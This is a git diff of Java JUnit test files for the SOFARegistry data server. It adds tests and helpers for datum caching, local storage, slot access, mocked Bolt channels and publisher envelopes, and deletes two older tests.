mode 100644 index 000000000..569a39202 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/MigrateTest.java @@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data; + +import com.alipay.remoting.serialization.HessianSerializer; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.io.BufferedOutputStream; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.util.*; +import java.util.zip.GZIPOutputStream; +import org.junit.Test; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-18 14:09 yuzhi.lyz Exp $ + */ +public class MigrateTest { + @Test + public void testBody() throws Exception { + HessianSerializer s = new HessianSerializer(); + List list = Lists.newArrayList(); + for (int i = 0; i < 10; i++) { + Map publisherMap = Maps.newHashMap(); + for (int j = 0; j < 1000; j++) { + publisherMap.put( + UUID.randomUUID().toString(), RegisterVersion.of(0, System.currentTimeMillis())); + } + DatumSummary summary = new DatumSummary("app" + System.currentTimeMillis(), publisherMap); + list.add(summary); + } + DataSlotDiffPublisherRequest request = new DataSlotDiffPublisherRequest(100, 200, list); + byte[] bs = s.serialize(request); + ByteArrayOutputStream b = new ByteArrayOutputStream(); + GZIPOutputStream zip = new GZIPOutputStream(b); + OutputStream out = new BufferedOutputStream(zip); + + out.write(bs); + out.flush(); + out.close(); + System.out.println(bs.length); + System.out.println(b.toByteArray().length); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestBaseUtils.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestBaseUtils.java new file mode 100644 index 000000000..ab9f73c09 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestBaseUtils.java @@ -0,0 +1,270 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.remoting.Connection; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.server.data.bootstrap.CommonConfig; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.cache.LocalDatumStorage; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.task.FastRejectedExecutionException; +import com.alipay.sofa.registry.task.KeyedThreadPoolExecutor; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import io.netty.channel.Channel; +import io.netty.util.Attribute; +import io.netty.util.AttributeKey; +import java.net.InetSocketAddress; +import java.util.List; +import java.util.Map; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicLong; +import org.junit.Assert; +import org.mockito.Mockito; +import org.mockito.invocation.InvocationOnMock; +import org.mockito.stubbing.Answer; + +public final class TestBaseUtils { + private static final AtomicLong REGISTER_ID_SEQ = new AtomicLong(); + private static final AtomicLong CLIENT_VERSION = new AtomicLong(); + + public static final String TEST_DATA_ID = "testDataId"; + public static final String TEST_DATA_INFO_ID; + + private static final String TEST_REGISTER_ID = "testRegisterId"; + + private static final AtomicLong DATA_ID_SEQ = new AtomicLong(); + + static { + Publisher p = TestBaseUtils.createTestPublisher(TEST_DATA_ID); + TEST_DATA_INFO_ID = p.getDataInfoId(); + } + + private TestBaseUtils() {} + + public static Publisher createTestPublisher(String dataId) { + Publisher publisher = new Publisher(); + DataInfo dataInfo = DataInfo.valueOf(DataInfo.toDataInfoId(dataId, "I", "G")); + publisher.setDataInfoId(dataInfo.getDataInfoId()); + publisher.setDataId(dataInfo.getDataId()); + publisher.setInstanceId(dataInfo.getInstanceId()); + publisher.setGroup(dataInfo.getGroup()); + publisher.setRegisterId(TEST_REGISTER_ID + REGISTER_ID_SEQ.incrementAndGet()); + publisher.setSessionProcessId(ServerEnv.PROCESS_ID); + publisher.setRegisterTimestamp(System.currentTimeMillis()); + publisher.setVersion(100 + CLIENT_VERSION.incrementAndGet()); + ConnectId connectId = + ConnectId.of( + ServerEnv.PROCESS_ID.getHostAddress() + ":9999", + ServerEnv.PROCESS_ID.getHostAddress() + ":9998"); + publisher.setSourceAddress(URL.valueOf(connectId.clientAddress())); + publisher.setTargetAddress(URL.valueOf(connectId.sessionAddress())); + return publisher; + } + + public static Publisher cloneBase(Publisher publisher) { + Publisher clone = TestBaseUtils.createTestPublisher(publisher.getDataId()); + clone.setRegisterId(publisher.getRegisterId()); + clone.setVersion(publisher.getVersion()); + clone.setRegisterTimestamp(publisher.getRegisterTimestamp()); + clone.setSessionProcessId(publisher.getSessionProcessId()); + return clone; + } + + public static void assertEquals(Datum datum, Publisher publisher) { + Assert.assertEquals(publisher.getDataInfoId(), datum.getDataInfoId()); + Assert.assertEquals(publisher.getDataId(), datum.getDataId()); + Assert.assertEquals(publisher.getInstanceId(), datum.getInstanceId()); + Assert.assertEquals(publisher.getGroup(), datum.getGroup()); + Assert.assertTrue(datum.getPubMap().containsKey(publisher.getRegisterId())); + } + + public static ConnectId notExistConnectId() { + return ConnectId.of("notExist:9999", "notExist:9998"); + } + + public static LocalDatumStorage newLocalStorage(String dataCenter, boolean init) { + DataServerConfig dataServerConfig = newDataConfig(dataCenter); + LocalDatumStorage storage = new LocalDatumStorage(); + storage.setDataServerConfig(dataServerConfig); + if (init) { + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + storage.getSlotChangeListener().onSlotAdd(i, Slot.Role.Leader); + } + } + return storage; + } + + public static DataServerConfig newDataConfig(String dataCenter) { + CommonConfig commonConfig = mock(CommonConfig.class); + when(commonConfig.getLocalDataCenter()).thenReturn(dataCenter); + return new DataServerConfig(commonConfig); + } + + public static DatumCache newLocalDatumCache(String localDataCenter, boolean init) { + DatumCache cache = new DatumCache(); + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(localDataCenter, init); + cache.setLocalDatumStorage(storage); + cache.setDataServerConfig(storage.getDataServerConfig()); + return cache; + } + + public static DatumSummary newDatumSummary(int pubCount) { + final String dataId = TEST_DATA_ID + "-" + DATA_ID_SEQ.incrementAndGet(); + return newDatumSummary(pubCount, dataId); + } + + public static DatumSummary newDatumSummary(int pubCount, String dataInfoId) { + Map versions = Maps.newHashMap(); + for (int i = 0; i < pubCount; i++) { + final String registerId = TEST_REGISTER_ID + "-" + REGISTER_ID_SEQ.incrementAndGet(); + versions.put( + registerId, + RegisterVersion.of(CLIENT_VERSION.incrementAndGet(), System.currentTimeMillis())); + } + return new DatumSummary(dataInfoId, versions); + } + + public static List createTestPublishers(int slotId, int count) { + List list = Lists.newArrayListWithCapacity(count); + for (int i = 0; i < Integer.MAX_VALUE; i++) { + Publisher p = + createTestPublisher(TEST_DATA_ID + "-" + DATA_ID_SEQ.incrementAndGet() + "-" + i); + int id = SlotFunctionRegistry.getFunc().slotOf(p.getDataInfoId()); + if (id == slotId) { + // find the slotId + list.add(p); + for (int j = 1; j < count; j++) { + list.add(createTestPublisher(p.getDataId())); + } + break; + } + } + return list; + } + + public static MockBlotChannel newChannel(int localPort, String remoteAddress, int remotePort) { + return new MockBlotChannel(localPort, remoteAddress, remotePort); + } + + public static final class MockBlotChannel extends BoltChannel { + final InetSocketAddress remote; + final InetSocketAddress local; + public volatile boolean connected = true; + private final AtomicBoolean active = new AtomicBoolean(true); + + public final Connection conn; + + public MockBlotChannel(int localPort, String remoteAddress, int remotePort) { + super(new Connection(createChn())); + this.conn = getConnection(); + this.local = new InetSocketAddress(ServerEnv.IP, localPort); + this.remote = new InetSocketAddress(remoteAddress, remotePort); + Channel chn = conn.getChannel(); + Mockito.when(chn.remoteAddress()).thenReturn(remote); + Mockito.when(chn.isActive()) + .thenAnswer( + new Answer() { + public Boolean answer(InvocationOnMock var1) throws Throwable { + return active.get(); + } + }); + } + + private static Channel createChn() { + Channel chn = Mockito.mock(io.netty.channel.Channel.class); + Mockito.when(chn.attr(Mockito.any(AttributeKey.class))) + .thenReturn(Mockito.mock(Attribute.class)); + return chn; + } + + @Override + public InetSocketAddress getRemoteAddress() { + return remote; + } + + @Override + public InetSocketAddress getLocalAddress() { + return local; + } + + @Override + public boolean isConnected() { + return active.get(); + } + + public void setActive(boolean b) { + active.set(b); + } + } + + public static SlotAccess moved() { + return new SlotAccess(1, 1, SlotAccess.Status.Moved, 1); + } + + public static SlotAccess accept() { + return accept(1, 1, 1); + } + + public static SlotAccess accept(int slotId, long tableEpoch, long leaderEpoch) { + return new SlotAccess(slotId, 1, SlotAccess.Status.Accept, leaderEpoch); + } + + public static SlotAccess migrating() { + return migrating(1, 1, 1); + } + + public static SlotAccess migrating(int slotId, long tableEpoch, long leaderEpoch) { + return new SlotAccess(slotId, 1, SlotAccess.Status.Migrating, leaderEpoch); + } + + public static SlotAccess misMatch() { + return new SlotAccess(1, 1, SlotAccess.Status.MisMatch, 1); + } + + public static void assertException(Class eclazz, Runnable runnable) { + try { + runnable.run(); + Assert.fail("except exception"); + } catch (Throwable exception) { + Assert.assertEquals(exception.getClass(), eclazz); + } + } + + public static KeyedThreadPoolExecutor rejectExecutor() { + KeyedThreadPoolExecutor executor = Mockito.mock(KeyedThreadPoolExecutor.class); + Mockito.when(executor.execute(Mockito.anyObject(), Mockito.anyObject())) + .thenThrow(new FastRejectedExecutionException("reject")); + return executor; + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestSyncData.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestSyncData.java deleted file mode 100644 index d1cf8ebad..000000000 --- a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TestSyncData.java +++ /dev/null @@ -1,103 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.datasync.Operator; -import com.alipay.sofa.registry.server.data.datasync.sync.Acceptor; -import org.junit.Assert; -import org.junit.Before; -import org.junit.Test; - -import java.util.Collection; - -/** - * - * @author shangyu.wh - * @version $Id: TestSyncData.java, v 0.1 2018-03-08 19:48 shangyu.wh Exp $ - */ -public class TestSyncData { - - private static Datum datum1; - private static Datum datum2; - private static Datum datum3; - private static Datum datum4; - private static Datum datum5; - - @Before - public void setup() { - //add - datum1 = new Datum(); - datum1.setVersion(1234); - datum1.setDataCenter("DefaultDataCenter"); - datum1.setDataInfoId("11"); - datum1.setInstanceId("1"); - - datum2 = new Datum(); - datum2.setVersion(5678); - datum2.setDataCenter("DefaultDataCenter"); - datum2.setDataInfoId("11"); - datum2.setInstanceId("2"); - - datum3 = new Datum(); - datum3.setVersion(1111); - datum3.setDataCenter("DefaultDataCenter"); - datum3.setDataInfoId("33"); - datum3.setInstanceId("3"); - - datum4 = new Datum(); - datum4.setVersion(2222); - datum4.setDataCenter("zui"); - datum4.setDataInfoId("11"); - datum4.setInstanceId("4"); - - datum5 = new Datum(); - datum5.setVersion(9999); - datum5.setDataCenter("DefaultDataCenter"); - datum5.setDataInfoId("11"); - datum5.setInstanceId("5"); - } - - @Test - public void testAcceptExpired() throws InterruptedException { - Acceptor acceptor = new Acceptor(30, "11", "DefaultDataCenter"); - - Operator operator1 = new Operator(System.currentTimeMillis(), 0L, datum1, - DataSourceTypeEnum.SYNC); - Thread.sleep(1000); - Operator operator2 = new Operator(System.currentTimeMillis(), operator1.getVersion(), - datum2, DataSourceTypeEnum.SYNC); - Thread.sleep(2000); - Operator operator5 = new Operator(System.currentTimeMillis(), operator2.getVersion(), - datum5, DataSourceTypeEnum.SYNC); - - acceptor.appendOperator(operator1); - acceptor.appendOperator(operator2); - acceptor.appendOperator(operator5); - - acceptor.checkExpired(3); - - Assert.assertEquals(2, acceptor.getAllOperators().size()); - Assert.assertTrue(acceptor.getLastVersion().equals(operator5.getVersion())); - - Collection operators = acceptor.getAllOperators(); - Operator[] ops = operators.toArray(new Operator[operators.size()]); - Assert.assertTrue(ops[0].getVersion().equals(operator2.getVersion())); - Assert.assertTrue(ops[1].getVersion().equals(operator5.getVersion())); - } -} \ No newline at end of file diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TimeUtilTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TimeUtilTest.java deleted file mode 100644 index 31890236b..000000000 --- a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/TimeUtilTest.java +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data; - -import com.alipay.sofa.registry.server.data.util.TimeUtil; -import org.junit.Test; - -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/16 - */ -public class TimeUtilTest { - @Test - public void doTest() { - long startTime = System.currentTimeMillis(); - for (int i = 0; i < 10; i++) { - TimeUtil.randomDelay(200); - } - assertTrue((System.currentTimeMillis() - startTime) < 2000); - } -} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/DatumCacheTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/DatumCacheTest.java new file mode 100644 index 000000000..227124c96 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/DatumCacheTest.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class DatumCacheTest { + private static final String testDataId = TestBaseUtils.TEST_DATA_ID; + private static final String testDataInfoId = TestBaseUtils.TEST_DATA_INFO_ID; + private static final String testDc = "localDc"; + + @Test + public void test() { + DatumCache cache = TestBaseUtils.newLocalDatumCache(testDc, true); + LocalDatumStorage storage = (LocalDatumStorage) cache.getLocalDatumStorage(); + + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + storage.put(publisher); + + Datum datum = cache.get("xx", publisher.getDataInfoId()); + TestBaseUtils.assertEquals(datum, publisher); + Map> datumMap = cache.getAll(); + TestBaseUtils.assertEquals(datumMap.get(testDc).get(publisher.getDataInfoId()), publisher); + + Map>> publisherMaps = cache.getAllPublisher(); + Assert.assertTrue(publisherMaps.get(testDc).get(publisher.getDataInfoId()).contains(publisher)); + + Map publisherMap = cache.getByConnectId(publisher.connectId()); + Assert.assertTrue(publisherMap.get(publisher.getRegisterId()) == publisher); + + DatumVersion v = cache.getVersion("xx", publisher.getDataInfoId()); + Assert.assertEquals(v.getValue(), datum.getVersion()); + + final int slotId = SlotFunctionRegistry.getFunc().slotOf(publisher.getDataInfoId()); + Map versionMap = cache.getVersions("xx", slotId, null); + Assert.assertEquals(versionMap.get(publisher.getDataInfoId()).getValue(), datum.getVersion()); + v = cache.updateVersion("xx", publisher.getDataInfoId()); + Assert.assertTrue(v.getValue() > datum.getVersion()); + + cache.clean("xx", publisher.getDataInfoId()); + + datum = cache.get("xx", publisher.getDataInfoId()); + Assert.assertTrue(datum.getPubMap().isEmpty()); + Assert.assertTrue(v.getValue() < datum.getVersion()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorageTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorageTest.java new file mode 100644 index 000000000..d42b09057 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorageTest.java @@ -0,0 +1,230 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; + +public class LocalDatumStorageTest { + private static final String testDataId = TestBaseUtils.TEST_DATA_ID; + private static final String testDataInfoId = TestBaseUtils.TEST_DATA_INFO_ID; + private static final String testDc = "localDc"; + + @Test + public void testNew() { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(testDc, false); + assertEmpty(storage); + } + + private void assertEmpty(LocalDatumStorage storage) { + Datum datum = storage.get(testDataInfoId); + Assert.assertNull(datum); + + DatumVersion v = storage.getVersion(testDataInfoId); + Assert.assertNull(v); + + Map datumMap = storage.getAll(); + Assert.assertTrue(datumMap.isEmpty()); + + Map> publisherMap = storage.getAllPublisher(); + Assert.assertTrue(publisherMap.isEmpty()); + + Map versionMap = storage.getVersions(0, null); + Assert.assertTrue(versionMap.isEmpty()); + + Map> publisherMaps = storage.getPublishers(0); + Assert.assertTrue(publisherMaps.isEmpty()); + + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + v = storage.put(publisher); + Assert.assertNull(v); + v = storage.createEmptyDatumIfAbsent(testDataInfoId, testDc); + Assert.assertNull(v); + v = storage.put(publisher.getDataInfoId(), Lists.newArrayList(publisher)); + Assert.assertNull(v); + } + + @Test + public void testPut() { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(testDc, true); + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + DatumVersion v = storage.put(publisher); + Assert.assertNotNull(v); + Datum datum = storage.get(publisher.getDataInfoId()); + TestBaseUtils.assertEquals(datum, publisher); + v = storage.getVersion(publisher.getDataInfoId()); + Assert.assertEquals(v.getValue(), datum.getVersion()); + + Map publisherMap = storage.getByConnectId(publisher.connectId()); + Assert.assertEquals(publisherMap.size(), 1); + Assert.assertEquals(publisherMap.get(publisher.getRegisterId()), publisher); + + Map> publisherMaps = storage.getAllPublisher(); + Assert.assertEquals(publisherMaps.size(), 1); + Assert.assertEquals(publisherMaps.get(publisher.getDataInfoId()).size(), 1); + Assert.assertTrue(publisherMaps.get(publisher.getDataInfoId()).contains(publisher)); + + Map datumMap = storage.getAll(); + Assert.assertEquals(datumMap.size(), 1); + TestBaseUtils.assertEquals(datumMap.get(publisher.getDataInfoId()), publisher); + + final int slotId = SlotFunctionRegistry.getFunc().slotOf(publisher.getDataInfoId()); + Map> slotMaps = storage.getPublishers(slotId); + Assert.assertEquals(slotMaps.size(), 1); + Assert.assertEquals(slotMaps.get(publisher.getDataInfoId()).size(), 1); + Assert.assertEquals( + slotMaps.get(publisher.getDataInfoId()).get(publisher.getRegisterId()), publisher); + + Map versionMap = storage.getVersions(slotId, null); + Assert.assertEquals(versionMap.size(), 1); + Assert.assertEquals(versionMap.get(publisher.getDataInfoId()).getValue(), datum.getVersion()); + + versionMap = storage.getVersions(slotId + 1, null); + Assert.assertEquals(versionMap.size(), 0); + + versionMap = storage.getVersions(slotId - 1, null); + Assert.assertEquals(versionMap.size(), 0); + + Set processIds = storage.getSessionProcessIds(); + Assert.assertEquals(processIds.size(), 1); + Assert.assertTrue(processIds.contains(publisher.getSessionProcessId())); + + Map summaryMap = storage.getDatumSummary(slotId, "xxx"); + Assert.assertEquals(summaryMap.size(), 0); + + summaryMap = storage.getDatumSummary(slotId, publisher.getTargetAddress().getIpAddress()); + Assert.assertEquals(summaryMap.size(), 1); + Assert.assertEquals( + summaryMap.get(publisher.getDataInfoId()).getDataInfoId(), publisher.getDataInfoId()); + Assert.assertEquals(summaryMap.get(publisher.getDataInfoId()).getPublisherVersions().size(), 1); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + + summaryMap = storage.getDatumSummary(slotId, null); + Assert.assertEquals(summaryMap.size(), 1); + Assert.assertEquals( + summaryMap.get(publisher.getDataInfoId()).getDataInfoId(), publisher.getDataInfoId()); + Assert.assertEquals(summaryMap.get(publisher.getDataInfoId()).getPublisherVersions().size(), 1); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + storage.getSlotChangeListener().onSlotRemove(i, Slot.Role.Leader); + } + assertEmpty(storage); + } + + @Test + public void testRemove() { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(testDc, true); + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + Publisher publisher2 = TestBaseUtils.createTestPublisher(testDataId); + + Publisher publisher3 = TestBaseUtils.createTestPublisher(testDataId + "-3"); + + storage.put(publisher); + storage.put(publisher2); + storage.put(publisher3); + DatumVersion v = storage.remove(publisher.getDataInfoId(), publisher2.getSessionProcessId()); + Assert.assertNotNull(v); + Map> map = storage.getAllPublisher(); + Assert.assertEquals(map.size(), 2); + Assert.assertEquals(map.get(publisher.getDataInfoId()).size(), 0); + Assert.assertEquals(map.get(publisher3.getDataInfoId()).size(), 1); + + v = + storage.remove( + publisher3.getDataInfoId(), + publisher3.getSessionProcessId(), + Collections.singletonMap(publisher3.getRegisterId(), publisher3.registerVersion())); + Assert.assertNotNull(v); + + map = storage.getAllPublisher(); + Assert.assertEquals(map.size(), 2); + Assert.assertEquals(map.get(publisher.getDataInfoId()).size(), 0); + Assert.assertEquals(map.get(publisher3.getDataInfoId()).size(), 0); + + v = storage.put(publisher3); + Assert.assertNull(v); + + Map compacts = storage.compact(Long.MIN_VALUE); + Assert.assertEquals(compacts.size(), 0); + + compacts = storage.compact(System.currentTimeMillis()); + Assert.assertEquals(compacts.size(), 1); + Assert.assertTrue(compacts.containsKey(publisher3.getDataInfoId())); + + v = storage.put(publisher3); + Assert.assertNotNull(v); + } + + @Test + public void testUpdateVersion() { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(testDc, true); + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + storage.put(publisher); + DatumVersion v1 = storage.getVersion(publisher.getDataInfoId()); + DatumVersion v2 = storage.updateVersion(publisher.getDataInfoId()); + Assert.assertTrue(v2.getValue() > v1.getValue()); + final int slotId = SlotFunctionRegistry.getFunc().slotOf(publisher.getDataInfoId()); + storage.updateVersion(slotId); + DatumVersion v3 = storage.getVersion(publisher.getDataInfoId()); + Assert.assertTrue(v3.getValue() > v2.getValue()); + } + + @Test + public void testClean() { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage(testDc, true); + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + Publisher publisher2 = TestBaseUtils.createTestPublisher(testDataId); + storage.put(publisher); + storage.put(publisher2); + + int slotId = SlotFunctionRegistry.getFunc().slotOf(publisher.getDataInfoId()); + Map versionMap = + storage.clean(slotId + 1, publisher.getSessionProcessId(), CleanContinues.ALWAYS); + Assert.assertEquals(versionMap.size(), 0); + versionMap = storage.clean(slotId, publisher.getSessionProcessId(), CleanContinues.ALWAYS); + Assert.assertEquals(versionMap.size(), 1); + Assert.assertTrue(versionMap.containsKey(publisher.getDataInfoId())); + Map> map = storage.getAllPublisher(); + Assert.assertEquals(map.size(), 1); + Assert.assertEquals(map.get(publisher.getDataInfoId()).size(), 0); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelopeTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelopeTest.java new file mode 100644 index 000000000..38a7fad0a --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelopeTest.java @@ -0,0 +1,72 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.UnPublisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherEnvelopeTest { + + @Test(expected = IllegalArgumentException.class) + public void testErrorType() { + Publisher p = + new Publisher() { + public DataType getDataType() { + return DataType.SUBSCRIBER; + } + + public ProcessId getSessionProcessId() { + return ServerEnv.PROCESS_ID; + } + }; + PublisherEnvelope.of(p); + } + + @Test + public void test() { + Publisher publisher = TestBaseUtils.createTestPublisher("testDataInfoId"); + PublisherEnvelope envelope = PublisherEnvelope.of(publisher); + ParaCheckUtil.checkNotBlank(envelope.toString(), "tostring"); + Assert.assertTrue(publisher == envelope.publisher); + Assert.assertEquals(publisher.registerVersion(), envelope.registerVersion); + Assert.assertEquals(publisher.registerVersion(), envelope.getVersionIfPub()); + Assert.assertEquals(publisher.getSessionProcessId(), ServerEnv.PROCESS_ID); + Assert.assertEquals(Long.MAX_VALUE, envelope.tombstoneTimestamp); + Assert.assertTrue(envelope.isPub()); + 